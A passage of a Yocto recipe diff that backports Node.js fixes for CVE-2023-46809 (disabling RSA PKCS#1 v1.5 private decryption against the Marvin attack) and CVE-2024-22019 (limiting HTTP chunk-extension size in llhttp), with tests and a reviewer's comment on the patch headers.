++ ++ if (EVP_PKEY_decrypt_init(ctx.get()) <= 0) { ++ return ThrowCryptoError(env, ERR_get_error()); ++ } ++ ++ int rsa_pkcs1_implicit_rejection = ++ EVP_PKEY_CTX_ctrl_str(ctx.get(), "rsa_pkcs1_implicit_rejection", "1"); ++ // From the doc -2 means that the option is not supported. ++ // The default for the option is enabled and if it has been ++ // specifically disabled we want to respect that so we will ++ // not throw an error if the option is supported regardless ++ // of how it is set. The call to set the value ++ // will not affect what is used since a different context is ++ // used in the call if the option is supported ++ if (rsa_pkcs1_implicit_rejection <= 0) { ++ return THROW_ERR_INVALID_ARG_VALUE( ++ env, ++ "RSA_PKCS1_PADDING is no longer supported for private decryption," ++ " this can be reverted with --security-revert=CVE-2023-46809"); ++ } ++ } ++ + const EVP_MD* digest = nullptr; + if (args[offset + 2]->IsString()) { + const Utf8Value oaep_str(env->isolate(), args[offset + 2]); +diff --git a/src/node_revert.h b/src/node_revert.h +index 83dcb62..bc2a288 100644 +--- a/src/node_revert.h ++++ b/src/node_revert.h +@@ -18,6 +18,7 @@ namespace node { + #define SECURITY_REVERSIONS(XX) \ + XX(CVE_2021_44531, "CVE-2021-44531", "Cert Verif Bypass via URI SAN") \ + XX(CVE_2021_44532, "CVE-2021-44532", "Cert Verif Bypass via Str Inject") \ ++ XX(CVE_2023_46809, "CVE-2023-46809", "Marvin attack on PKCS#1 padding") \ + // XX(CVE_2016_PEND, "CVE-2016-PEND", "Vulnerability Title") + + enum reversion { +diff --git a/test/parallel/test-crypto-rsa-dsa-revert.js b/test/parallel/test-crypto-rsa-dsa-revert.js +new file mode 100644 +index 0000000..84ec8f6 +--- /dev/null ++++ b/test/parallel/test-crypto-rsa-dsa-revert.js +@@ -0,0 +1,475 @@ ++'use strict'; ++// Flags: --security-revert=CVE-2023-46809 ++const common = require('../common'); ++if (!common.hasCrypto) ++ common.skip('missing crypto'); ++ ++const assert = require('assert'); ++const crypto = require('crypto'); ++ 
++const constants = crypto.constants; ++ ++const fixtures = require('../common/fixtures'); ++ ++// Test certificates ++const certPem = fixtures.readKey('rsa_cert.crt'); ++const keyPem = fixtures.readKey('rsa_private.pem'); ++const rsaKeySize = 2048; ++const rsaPubPem = fixtures.readKey('rsa_public.pem', 'ascii'); ++const rsaKeyPem = fixtures.readKey('rsa_private.pem', 'ascii'); ++const rsaKeyPemEncrypted = fixtures.readKey('rsa_private_encrypted.pem', ++ 'ascii'); ++const dsaPubPem = fixtures.readKey('dsa_public.pem', 'ascii'); ++const dsaKeyPem = fixtures.readKey('dsa_private.pem', 'ascii'); ++const dsaKeyPemEncrypted = fixtures.readKey('dsa_private_encrypted.pem', ++ 'ascii'); ++const rsaPkcs8KeyPem = fixtures.readKey('rsa_private_pkcs8.pem'); ++const dsaPkcs8KeyPem = fixtures.readKey('dsa_private_pkcs8.pem'); ++ ++const ec = new TextEncoder(); ++ ++const openssl1DecryptError = { ++ message: 'error:06065064:digital envelope routines:EVP_DecryptFinal_ex:' + ++ 'bad decrypt', ++ code: 'ERR_OSSL_EVP_BAD_DECRYPT', ++ reason: 'bad decrypt', ++ function: 'EVP_DecryptFinal_ex', ++ library: 'digital envelope routines', ++}; ++ ++const decryptError = common.hasOpenSSL3 ? ++ { message: 'error:1C800064:Provider routines::bad decrypt' } : ++ openssl1DecryptError; ++ ++const decryptPrivateKeyError = common.hasOpenSSL3 ? 
{ ++ message: 'error:1C800064:Provider routines::bad decrypt', ++} : openssl1DecryptError; ++ ++function getBufferCopy(buf) { ++ return buf.buffer.slice(buf.byteOffset, buf.byteOffset + buf.byteLength); ++} ++ ++// Test RSA encryption/decryption ++{ ++ const input = 'I AM THE WALRUS'; ++ const bufferToEncrypt = Buffer.from(input); ++ const bufferPassword = Buffer.from('password'); ++ ++ let encryptedBuffer = crypto.publicEncrypt(rsaPubPem, bufferToEncrypt); ++ ++ // Test other input types ++ let otherEncrypted; ++ { ++ const ab = getBufferCopy(ec.encode(rsaPubPem)); ++ const ab2enc = getBufferCopy(bufferToEncrypt); ++ ++ crypto.publicEncrypt(ab, ab2enc); ++ crypto.publicEncrypt(new Uint8Array(ab), new Uint8Array(ab2enc)); ++ crypto.publicEncrypt(new DataView(ab), new DataView(ab2enc)); ++ otherEncrypted = crypto.publicEncrypt({ ++ key: Buffer.from(ab).toString('hex'), ++ encoding: 'hex' ++ }, Buffer.from(ab2enc).toString('hex')); ++ } ++ ++ let decryptedBuffer = crypto.privateDecrypt(rsaKeyPem, encryptedBuffer); ++ const otherDecrypted = crypto.privateDecrypt(rsaKeyPem, otherEncrypted); ++ assert.strictEqual(decryptedBuffer.toString(), input); ++ assert.strictEqual(otherDecrypted.toString(), input); ++ ++ decryptedBuffer = crypto.privateDecrypt(rsaPkcs8KeyPem, encryptedBuffer); ++ assert.strictEqual(decryptedBuffer.toString(), input); ++ ++ let decryptedBufferWithPassword = crypto.privateDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: 'password' ++ }, encryptedBuffer); ++ ++ const otherDecryptedBufferWithPassword = crypto.privateDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: ec.encode('password') ++ }, encryptedBuffer); ++ ++ assert.strictEqual( ++ otherDecryptedBufferWithPassword.toString(), ++ decryptedBufferWithPassword.toString()); ++ ++ decryptedBufferWithPassword = crypto.privateDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: 'password' ++ }, encryptedBuffer); ++ ++ assert.strictEqual(decryptedBufferWithPassword.toString(), input); ++ ++ 
encryptedBuffer = crypto.publicEncrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: 'password' ++ }, bufferToEncrypt); ++ ++ decryptedBufferWithPassword = crypto.privateDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: 'password' ++ }, encryptedBuffer); ++ assert.strictEqual(decryptedBufferWithPassword.toString(), input); ++ ++ encryptedBuffer = crypto.privateEncrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, bufferToEncrypt); ++ ++ decryptedBufferWithPassword = crypto.publicDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, encryptedBuffer); ++ assert.strictEqual(decryptedBufferWithPassword.toString(), input); ++ ++ // Now with explicit RSA_PKCS1_PADDING. ++ encryptedBuffer = crypto.privateEncrypt({ ++ padding: crypto.constants.RSA_PKCS1_PADDING, ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, bufferToEncrypt); ++ ++ decryptedBufferWithPassword = crypto.publicDecrypt({ ++ padding: crypto.constants.RSA_PKCS1_PADDING, ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, encryptedBuffer); ++ assert.strictEqual(decryptedBufferWithPassword.toString(), input); ++ ++ // Omitting padding should be okay because RSA_PKCS1_PADDING is the default. ++ decryptedBufferWithPassword = crypto.publicDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, encryptedBuffer); ++ assert.strictEqual(decryptedBufferWithPassword.toString(), input); ++ ++ // Now with RSA_NO_PADDING. Plaintext needs to match key size. ++ // OpenSSL 3.x has a rsa_check_padding that will cause an error if ++ // RSA_NO_PADDING is used. 
++ if (!common.hasOpenSSL3) { ++ { ++ const plaintext = 'x'.repeat(rsaKeySize / 8); ++ encryptedBuffer = crypto.privateEncrypt({ ++ padding: crypto.constants.RSA_NO_PADDING, ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, Buffer.from(plaintext)); ++ ++ decryptedBufferWithPassword = crypto.publicDecrypt({ ++ padding: crypto.constants.RSA_NO_PADDING, ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, encryptedBuffer); ++ assert.strictEqual(decryptedBufferWithPassword.toString(), plaintext); ++ } ++ } ++ ++ encryptedBuffer = crypto.publicEncrypt(certPem, bufferToEncrypt); ++ ++ decryptedBuffer = crypto.privateDecrypt(keyPem, encryptedBuffer); ++ assert.strictEqual(decryptedBuffer.toString(), input); ++ ++ encryptedBuffer = crypto.publicEncrypt(keyPem, bufferToEncrypt); ++ ++ decryptedBuffer = crypto.privateDecrypt(keyPem, encryptedBuffer); ++ assert.strictEqual(decryptedBuffer.toString(), input); ++ ++ encryptedBuffer = crypto.privateEncrypt(keyPem, bufferToEncrypt); ++ ++ decryptedBuffer = crypto.publicDecrypt(keyPem, encryptedBuffer); ++ assert.strictEqual(decryptedBuffer.toString(), input); ++ ++ assert.throws(() => { ++ crypto.privateDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: 'wrong' ++ }, bufferToEncrypt); ++ }, decryptError); ++ ++ assert.throws(() => { ++ crypto.publicEncrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: 'wrong' ++ }, encryptedBuffer); ++ }, decryptError); ++ ++ encryptedBuffer = crypto.privateEncrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: Buffer.from('password') ++ }, bufferToEncrypt); ++ ++ assert.throws(() => { ++ crypto.publicDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: Buffer.from('wrong') ++ }, encryptedBuffer); ++ }, decryptError); ++} ++ ++function test_rsa(padding, encryptOaepHash, decryptOaepHash) { ++ const size = (padding === 'RSA_NO_PADDING') ? 
rsaKeySize / 8 : 32; ++ const input = Buffer.allocUnsafe(size); ++ for (let i = 0; i < input.length; i++) ++ input[i] = (i * 7 + 11) & 0xff; ++ const bufferToEncrypt = Buffer.from(input); ++ ++ padding = constants[padding]; ++ ++ const encryptedBuffer = crypto.publicEncrypt({ ++ key: rsaPubPem, ++ padding: padding, ++ oaepHash: encryptOaepHash ++ }, bufferToEncrypt); ++ ++ let decryptedBuffer = crypto.privateDecrypt({ ++ key: rsaKeyPem, ++ padding: padding, ++ oaepHash: decryptOaepHash ++ }, encryptedBuffer); ++ assert.deepStrictEqual(decryptedBuffer, input); ++ ++ decryptedBuffer = crypto.privateDecrypt({ ++ key: rsaPkcs8KeyPem, ++ padding: padding, ++ oaepHash: decryptOaepHash ++ }, encryptedBuffer); ++ assert.deepStrictEqual(decryptedBuffer, input); ++} ++ ++test_rsa('RSA_NO_PADDING'); ++test_rsa('RSA_PKCS1_PADDING'); ++test_rsa('RSA_PKCS1_OAEP_PADDING'); ++ ++// Test OAEP with different hash functions. ++test_rsa('RSA_PKCS1_OAEP_PADDING', undefined, 'sha1'); ++test_rsa('RSA_PKCS1_OAEP_PADDING', 'sha1', undefined); ++test_rsa('RSA_PKCS1_OAEP_PADDING', 'sha256', 'sha256'); ++test_rsa('RSA_PKCS1_OAEP_PADDING', 'sha512', 'sha512'); ++assert.throws(() => { ++ test_rsa('RSA_PKCS1_OAEP_PADDING', 'sha256', 'sha512'); ++}, { ++ code: 'ERR_OSSL_RSA_OAEP_DECODING_ERROR' ++}); ++ ++// The following RSA-OAEP test cases were created using the WebCrypto API to ++// ensure compatibility when using non-SHA1 hash functions. ++{ ++ const { decryptionTests } = ++ JSON.parse(fixtures.readSync('rsa-oaep-test-vectors.js', 'utf8')); ++ ++ for (const { ct, oaepHash, oaepLabel } of decryptionTests) { ++ const label = oaepLabel ? Buffer.from(oaepLabel, 'hex') : undefined; ++ const copiedLabel = oaepLabel ? getBufferCopy(label) : undefined; ++ ++ const decrypted = crypto.privateDecrypt({ ++ key: rsaPkcs8KeyPem, ++ oaepHash, ++ oaepLabel: oaepLabel ? 
label : undefined ++ }, Buffer.from(ct, 'hex')); ++ ++ assert.strictEqual(decrypted.toString('utf8'), 'Hello Node.js'); ++ ++ const otherDecrypted = crypto.privateDecrypt({ ++ key: rsaPkcs8KeyPem, ++ oaepHash, ++ oaepLabel: copiedLabel ++ }, Buffer.from(ct, 'hex')); ++ ++ assert.strictEqual(otherDecrypted.toString('utf8'), 'Hello Node.js'); ++ } ++} ++ ++// Test invalid oaepHash and oaepLabel options. ++for (const fn of [crypto.publicEncrypt, crypto.privateDecrypt]) { ++ assert.throws(() => { ++ fn({ ++ key: rsaPubPem, ++ oaepHash: 'Hello world' ++ }, Buffer.alloc(10)); ++ }, { ++ code: 'ERR_OSSL_EVP_INVALID_DIGEST' ++ }); ++ ++ for (const oaepHash of [0, false, null, Symbol(), () => {}]) { ++ assert.throws(() => { ++ fn({ ++ key: rsaPubPem, ++ oaepHash ++ }, Buffer.alloc(10)); ++ }, { ++ code: 'ERR_INVALID_ARG_TYPE' ++ }); ++ } ++ ++ for (const oaepLabel of [0, false, null, Symbol(), () => {}, {}]) { ++ assert.throws(() => { ++ fn({ ++ key: rsaPubPem, ++ oaepLabel ++ }, Buffer.alloc(10)); ++ }, { ++ code: 'ERR_INVALID_ARG_TYPE' ++ }); ++ } ++} ++ ++// Test RSA key signing/verification ++let rsaSign = crypto.createSign('SHA1'); ++let rsaVerify = crypto.createVerify('SHA1'); ++assert.ok(rsaSign); ++assert.ok(rsaVerify); ++ ++const expectedSignature = fixtures.readKey( ++ 'rsa_public_sha1_signature_signedby_rsa_private_pkcs8.sha1', ++ 'hex' ++); ++ ++rsaSign.update(rsaPubPem); ++let rsaSignature = rsaSign.sign(rsaKeyPem, 'hex'); ++assert.strictEqual(rsaSignature, expectedSignature); ++ ++rsaVerify.update(rsaPubPem); ++assert.strictEqual(rsaVerify.verify(rsaPubPem, rsaSignature, 'hex'), true); ++ ++// Test RSA PKCS#8 key signing/verification ++rsaSign = crypto.createSign('SHA1'); ++rsaSign.update(rsaPubPem); ++rsaSignature = rsaSign.sign(rsaPkcs8KeyPem, 'hex'); ++assert.strictEqual(rsaSignature, expectedSignature); ++ ++rsaVerify = crypto.createVerify('SHA1'); ++rsaVerify.update(rsaPubPem); ++assert.strictEqual(rsaVerify.verify(rsaPubPem, rsaSignature, 'hex'), true); 
++ ++// Test RSA key signing/verification with encrypted key ++rsaSign = crypto.createSign('SHA1'); ++rsaSign.update(rsaPubPem); ++const signOptions = { key: rsaKeyPemEncrypted, passphrase: 'password' }; ++rsaSignature = rsaSign.sign(signOptions, 'hex'); ++assert.strictEqual(rsaSignature, expectedSignature); ++ ++rsaVerify = crypto.createVerify('SHA1'); ++rsaVerify.update(rsaPubPem); ++assert.strictEqual(rsaVerify.verify(rsaPubPem, rsaSignature, 'hex'), true); ++ ++rsaSign = crypto.createSign('SHA1'); ++rsaSign.update(rsaPubPem); ++assert.throws(() => { ++ const signOptions = { key: rsaKeyPemEncrypted, passphrase: 'wrong' }; ++ rsaSign.sign(signOptions, 'hex'); ++}, decryptPrivateKeyError); ++ ++// ++// Test RSA signing and verification ++// ++{ ++ const privateKey = fixtures.readKey('rsa_private_b.pem'); ++ const publicKey = fixtures.readKey('rsa_public_b.pem'); ++ ++ const input = 'I AM THE WALRUS'; ++ ++ const signature = fixtures.readKey( ++ 'I_AM_THE_WALRUS_sha256_signature_signedby_rsa_private_b.sha256', ++ 'hex' ++ ); ++ ++ const sign = crypto.createSign('SHA256'); ++ sign.update(input); ++ ++ const output = sign.sign(privateKey, 'hex'); ++ assert.strictEqual(output, signature); ++ ++ const verify = crypto.createVerify('SHA256'); ++ verify.update(input); ++ ++ assert.strictEqual(verify.verify(publicKey, signature, 'hex'), true); ++ ++ // Test the legacy signature algorithm name. ++ const sign2 = crypto.createSign('RSA-SHA256'); ++ sign2.update(input); ++ ++ const output2 = sign2.sign(privateKey, 'hex'); ++ assert.strictEqual(output2, signature); ++ ++ const verify2 = crypto.createVerify('SHA256'); ++ verify2.update(input); ++ ++ assert.strictEqual(verify2.verify(publicKey, signature, 'hex'), true); ++} ++ ++ ++// ++// Test DSA signing and verification ++// ++{ ++ const input = 'I AM THE WALRUS'; ++ ++ // DSA signatures vary across runs so there is no static string to verify ++ // against. 
++ const sign = crypto.createSign('SHA1'); ++ sign.update(input); ++ const signature = sign.sign(dsaKeyPem, 'hex'); ++ ++ const verify = crypto.createVerify('SHA1'); ++ verify.update(input); ++ ++ assert.strictEqual(verify.verify(dsaPubPem, signature, 'hex'), true); ++ ++ // Test the legacy 'DSS1' name. ++ const sign2 = crypto.createSign('DSS1'); ++ sign2.update(input); ++ const signature2 = sign2.sign(dsaKeyPem, 'hex'); ++ ++ const verify2 = crypto.createVerify('DSS1'); ++ verify2.update(input); ++ ++ assert.strictEqual(verify2.verify(dsaPubPem, signature2, 'hex'), true); ++} ++ ++ ++// ++// Test DSA signing and verification with PKCS#8 private key ++// ++{ ++ const input = 'I AM THE WALRUS'; ++ ++ // DSA signatures vary across runs so there is no static string to verify ++ // against. ++ const sign = crypto.createSign('SHA1'); ++ sign.update(input); ++ const signature = sign.sign(dsaPkcs8KeyPem, 'hex'); ++ ++ const verify = crypto.createVerify('SHA1'); ++ verify.update(input); ++ ++ assert.strictEqual(verify.verify(dsaPubPem, signature, 'hex'), true); ++} ++ ++ ++// ++// Test DSA signing and verification with encrypted key ++// ++const input = 'I AM THE WALRUS'; ++ ++{ ++ const sign = crypto.createSign('SHA1'); ++ sign.update(input); ++ assert.throws(() => { ++ sign.sign({ key: dsaKeyPemEncrypted, passphrase: 'wrong' }, 'hex'); ++ }, decryptPrivateKeyError); ++} ++ ++{ ++ // DSA signatures vary across runs so there is no static string to verify ++ // against. 
++ const sign = crypto.createSign('SHA1'); ++ sign.update(input); ++ const signOptions = { key: dsaKeyPemEncrypted, passphrase: 'password' }; ++ const signature = sign.sign(signOptions, 'hex'); ++ ++ const verify = crypto.createVerify('SHA1'); ++ verify.update(input); ++ ++ assert.strictEqual(verify.verify(dsaPubPem, signature, 'hex'), true); ++} +diff --git a/test/parallel/test-crypto-rsa-dsa.js b/test/parallel/test-crypto-rsa-dsa.js +index 9afcb38..fd27827 100644 +--- a/test/parallel/test-crypto-rsa-dsa.js ++++ b/test/parallel/test-crypto-rsa-dsa.js +@@ -220,20 +220,36 @@ function test_rsa(padding, encryptOaepHash, decryptOaepHash) { + padding: padding, + oaepHash: encryptOaepHash + }, bufferToEncrypt); ++ if (padding === constants.RSA_PKCS1_PADDING) { ++ assert.throws(() => { ++ crypto.privateDecrypt({ ++ key: rsaKeyPem, ++ padding: padding, ++ oaepHash: decryptOaepHash ++ }, encryptedBuffer); ++ }, { code: 'ERR_INVALID_ARG_VALUE' }); ++ assert.throws(() => { ++ crypto.privateDecrypt({ ++ key: rsaPkcs8KeyPem, ++ padding: padding, ++ oaepHash: decryptOaepHash ++ }, encryptedBuffer); ++ }, { code: 'ERR_INVALID_ARG_VALUE' }); ++ } else { ++ let decryptedBuffer = crypto.privateDecrypt({ ++ key: rsaKeyPem, ++ padding: padding, ++ oaepHash: decryptOaepHash ++ }, encryptedBuffer); ++ assert.deepStrictEqual(decryptedBuffer, input); + +- let decryptedBuffer = crypto.privateDecrypt({ +- key: rsaKeyPem, +- padding: padding, +- oaepHash: decryptOaepHash +- }, encryptedBuffer); +- assert.deepStrictEqual(decryptedBuffer, input); +- +- decryptedBuffer = crypto.privateDecrypt({ +- key: rsaPkcs8KeyPem, +- padding: padding, +- oaepHash: decryptOaepHash +- }, encryptedBuffer); +- assert.deepStrictEqual(decryptedBuffer, input); ++ decryptedBuffer = crypto.privateDecrypt({ ++ key: rsaPkcs8KeyPem, ++ padding: padding, ++ oaepHash: decryptOaepHash ++ }, encryptedBuffer); ++ assert.deepStrictEqual(decryptedBuffer, input); ++ } + } + + test_rsa('RSA_NO_PADDING'); +-- +2.40.0 
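Review bot: The guard added to `PublicKeyCipher::Cipher` throws only when `EVP_PKEY_CTX_ctrl_str(ctx.get(), "rsa_pkcs1_implicit_rejection", "1")` returns `<= 0`, so on an OpenSSL that supports implicit rejection, private decryption with `RSA_PKCS1_PADDING` stays enabled and the protection rests on the library. The updated `test_rsa` in test-crypto-rsa-dsa.js nevertheless expects `ERR_INVALID_ARG_VALUE` unconditionally. If this recipe can be built against such an OpenSSL (not visible here), that test would fail and the subject line would overstate what is disabled. A header line such as `Note: PKCS#1 v1.5 private decryption remains available when the linked OpenSSL supports rsa_pkcs1_implicit_rejection` would make the dependency explicit. The header also uses `CVE-ID: CVE-2023-46809` where the sibling CVE-2022-25883.patch uses `CVE: CVE-2022-25883`; writing `CVE: CVE-2023-46809` keeps the tag form consistent, and the same applies to the `CVE-ID:` line in CVE-2024-22019.patch.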
diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2024-22019.patch b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2024-22019.patch
new file mode 100644
index 0000000000..ca1c7981cc
--- /dev/null
+++ b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2024-22019.patch
@@ -0,0 +1,556 @@ +From 911cb33cdadab57a75f97186290ea8f3903a6171 Mon Sep 17 00:00:00 2001 +From: Paolo Insogna <paolo@cowtech.it> +Date: Tue, 9 Jan 2024 18:10:04 +0100 +Subject: [PATCH] http: add maximum chunk extension size + +PR-URL: https://github.com/nodejs-private/node-private/pull/520 +Refs: https://github.com/nodejs-private/node-private/pull/518 + +CVE-ID: CVE-2024-22019 + +Upstream-Status: Backport [https://github.com/nodejs/node/commit/911cb33cdadab57a] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + deps/llhttp/CMakeLists.txt | 2 +- + deps/llhttp/include/llhttp.h | 7 +- + deps/llhttp/src/api.c | 7 + + deps/llhttp/src/llhttp.c | 122 ++++++++++++++-- + doc/api/errors.md | 12 ++ + lib/_http_server.js | 8 ++ + src/node_http_parser.cc | 20 ++- + .../test-http-chunk-extensions-limit.js | 131 ++++++++++++++++++ + tools/update-llhttp.sh | 2 +- + 9 files changed, 292 insertions(+), 19 deletions(-) + create mode 100644 test/parallel/test-http-chunk-extensions-limit.js + +diff --git a/deps/llhttp/CMakeLists.txt b/deps/llhttp/CMakeLists.txt +index d038203..747564a 100644 +--- a/deps/llhttp/CMakeLists.txt ++++ b/deps/llhttp/CMakeLists.txt +@@ -1,7 +1,7 @@ + cmake_minimum_required(VERSION 3.5.1) + cmake_policy(SET CMP0069 NEW) + +-project(llhttp VERSION 6.0.11) ++project(llhttp VERSION 6.1.0) + include(GNUInstallDirs) + + set(CMAKE_C_STANDARD 99) +diff --git a/deps/llhttp/include/llhttp.h b/deps/llhttp/include/llhttp.h +index 2da66f1..78f27ab 100644 +--- a/deps/llhttp/include/llhttp.h ++++ b/deps/llhttp/include/llhttp.h +@@ -2,8 +2,8 @@ + #define INCLUDE_LLHTTP_H_ + + #define LLHTTP_VERSION_MAJOR 6 +-#define LLHTTP_VERSION_MINOR 0 +-#define LLHTTP_VERSION_PATCH 11 ++#define LLHTTP_VERSION_MINOR 1 ++#define LLHTTP_VERSION_PATCH 0 + + #ifndef LLHTTP_STRICT_MODE + # define LLHTTP_STRICT_MODE 0 +@@ -348,6 +348,9 @@ struct llhttp_settings_s { + */ + llhttp_cb on_headers_complete; + ++ /* Possible return values 0, -1, HPE_USER */ ++ 
llhttp_data_cb on_chunk_parameters; ++ + /* Possible return values 0, -1, HPE_USER */ + llhttp_data_cb on_body; + +diff --git a/deps/llhttp/src/api.c b/deps/llhttp/src/api.c +index c4ce197..d3065b3 100644 +--- a/deps/llhttp/src/api.c ++++ b/deps/llhttp/src/api.c +@@ -355,6 +355,13 @@ int llhttp__on_chunk_header(llhttp_t* s, const char* p, const char* endp) { + } + + ++int llhttp__on_chunk_parameters(llhttp_t* s, const char* p, const char* endp) { ++ int err; ++ SPAN_CALLBACK_MAYBE(s, on_chunk_parameters, p, endp - p); ++ return err; ++} ++ ++ + int llhttp__on_chunk_complete(llhttp_t* s, const char* p, const char* endp) { + int err; + CALLBACK_MAYBE(s, on_chunk_complete); +diff --git a/deps/llhttp/src/llhttp.c b/deps/llhttp/src/llhttp.c +index 5e7c5d1..5eb19f6 100644 +--- a/deps/llhttp/src/llhttp.c ++++ b/deps/llhttp/src/llhttp.c +@@ -340,6 +340,8 @@ enum llparse_state_e { + s_n_llhttp__internal__n_invoke_is_equal_content_length, + s_n_llhttp__internal__n_chunk_size_almost_done, + s_n_llhttp__internal__n_chunk_parameters, ++ s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters, ++ s_n_llhttp__internal__n_chunk_parameters_ows, + s_n_llhttp__internal__n_chunk_size_otherwise, + s_n_llhttp__internal__n_chunk_size, + s_n_llhttp__internal__n_chunk_size_digit, +@@ -539,6 +541,10 @@ int llhttp__on_body( + llhttp__internal_t* s, const unsigned char* p, + const unsigned char* endp); + ++int llhttp__on_chunk_parameters( ++ llhttp__internal_t* s, const unsigned char* p, ++ const unsigned char* endp); ++ + int llhttp__on_status( + llhttp__internal_t* s, const unsigned char* p, + const unsigned char* endp); +@@ -1226,8 +1232,7 @@ static llparse_state_t llhttp__internal__run( + goto s_n_llhttp__internal__n_chunk_parameters; + } + case 2: { +- p++; +- goto s_n_llhttp__internal__n_chunk_size_almost_done; ++ goto s_n_llhttp__internal__n_span_end_llhttp__on_chunk_parameters; + } + default: { + goto s_n_llhttp__internal__n_error_10; +@@ -1236,6 +1241,34 @@ static 
llparse_state_t llhttp__internal__run( + /* UNREACHABLE */; + abort(); + } ++ case s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters: ++ s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters: { ++ if (p == endp) { ++ return s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters; ++ } ++ state->_span_pos0 = (void*) p; ++ state->_span_cb0 = llhttp__on_chunk_parameters; ++ goto s_n_llhttp__internal__n_chunk_parameters; ++ /* UNREACHABLE */; ++ abort(); ++ } ++ case s_n_llhttp__internal__n_chunk_parameters_ows: ++ s_n_llhttp__internal__n_chunk_parameters_ows: { ++ if (p == endp) { ++ return s_n_llhttp__internal__n_chunk_parameters_ows; ++ } ++ switch (*p) { ++ case ' ': { ++ p++; ++ goto s_n_llhttp__internal__n_chunk_parameters_ows; ++ } ++ default: { ++ goto s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters; ++ } ++ } ++ /* UNREACHABLE */; ++ abort(); ++ } + case s_n_llhttp__internal__n_chunk_size_otherwise: + s_n_llhttp__internal__n_chunk_size_otherwise: { + if (p == endp) { +@@ -1246,13 +1279,9 @@ static llparse_state_t llhttp__internal__run( + p++; + goto s_n_llhttp__internal__n_chunk_size_almost_done; + } +- case ' ': { +- p++; +- goto s_n_llhttp__internal__n_chunk_parameters; +- } + case ';': { + p++; +- goto s_n_llhttp__internal__n_chunk_parameters; ++ goto s_n_llhttp__internal__n_chunk_parameters_ows; + } + default: { + goto s_n_llhttp__internal__n_error_11; +@@ -6074,6 +6103,24 @@ static llparse_state_t llhttp__internal__run( + /* UNREACHABLE */; + abort(); + } ++ s_n_llhttp__internal__n_span_end_llhttp__on_chunk_parameters: { ++ const unsigned char* start; ++ int err; ++ ++ start = state->_span_pos0; ++ state->_span_pos0 = NULL; ++ err = llhttp__on_chunk_parameters(state, start, p); ++ if (err != 0) { ++ state->error = err; ++ state->error_pos = (const char*) (p + 1); ++ state->_current = (void*) (intptr_t) s_n_llhttp__internal__n_chunk_size_almost_done; ++ return s_error; ++ } ++ p++; ++ goto 
s_n_llhttp__internal__n_chunk_size_almost_done; ++ /* UNREACHABLE */; ++ abort(); ++ } + s_n_llhttp__internal__n_error_10: { + state->error = 0x2; + state->reason = "Invalid character in chunk parameters"; +@@ -8441,6 +8488,8 @@ enum llparse_state_e { + s_n_llhttp__internal__n_invoke_is_equal_content_length, + s_n_llhttp__internal__n_chunk_size_almost_done, + s_n_llhttp__internal__n_chunk_parameters, ++ s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters, ++ s_n_llhttp__internal__n_chunk_parameters_ows, + s_n_llhttp__internal__n_chunk_size_otherwise, + s_n_llhttp__internal__n_chunk_size, + s_n_llhttp__internal__n_chunk_size_digit, +@@ -8635,6 +8684,10 @@ int llhttp__on_body( + llhttp__internal_t* s, const unsigned char* p, + const unsigned char* endp); + ++int llhttp__on_chunk_parameters( ++ llhttp__internal_t* s, const unsigned char* p, ++ const unsigned char* endp); ++ + int llhttp__on_status( + llhttp__internal_t* s, const unsigned char* p, + const unsigned char* endp); +@@ -9299,8 +9352,7 @@ static llparse_state_t llhttp__internal__run( + goto s_n_llhttp__internal__n_chunk_parameters; + } + case 2: { +- p++; +- goto s_n_llhttp__internal__n_chunk_size_almost_done; ++ goto s_n_llhttp__internal__n_span_end_llhttp__on_chunk_parameters; + } + default: { + goto s_n_llhttp__internal__n_error_6; +@@ -9309,6 +9361,34 @@ static llparse_state_t llhttp__internal__run( + /* UNREACHABLE */; + abort(); + } ++ case s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters: ++ s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters: { ++ if (p == endp) { ++ return s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters; ++ } ++ state->_span_pos0 = (void*) p; ++ state->_span_cb0 = llhttp__on_chunk_parameters; ++ goto s_n_llhttp__internal__n_chunk_parameters; ++ /* UNREACHABLE */; ++ abort(); ++ } ++ case s_n_llhttp__internal__n_chunk_parameters_ows: ++ s_n_llhttp__internal__n_chunk_parameters_ows: { ++ if (p == endp) { ++ return 
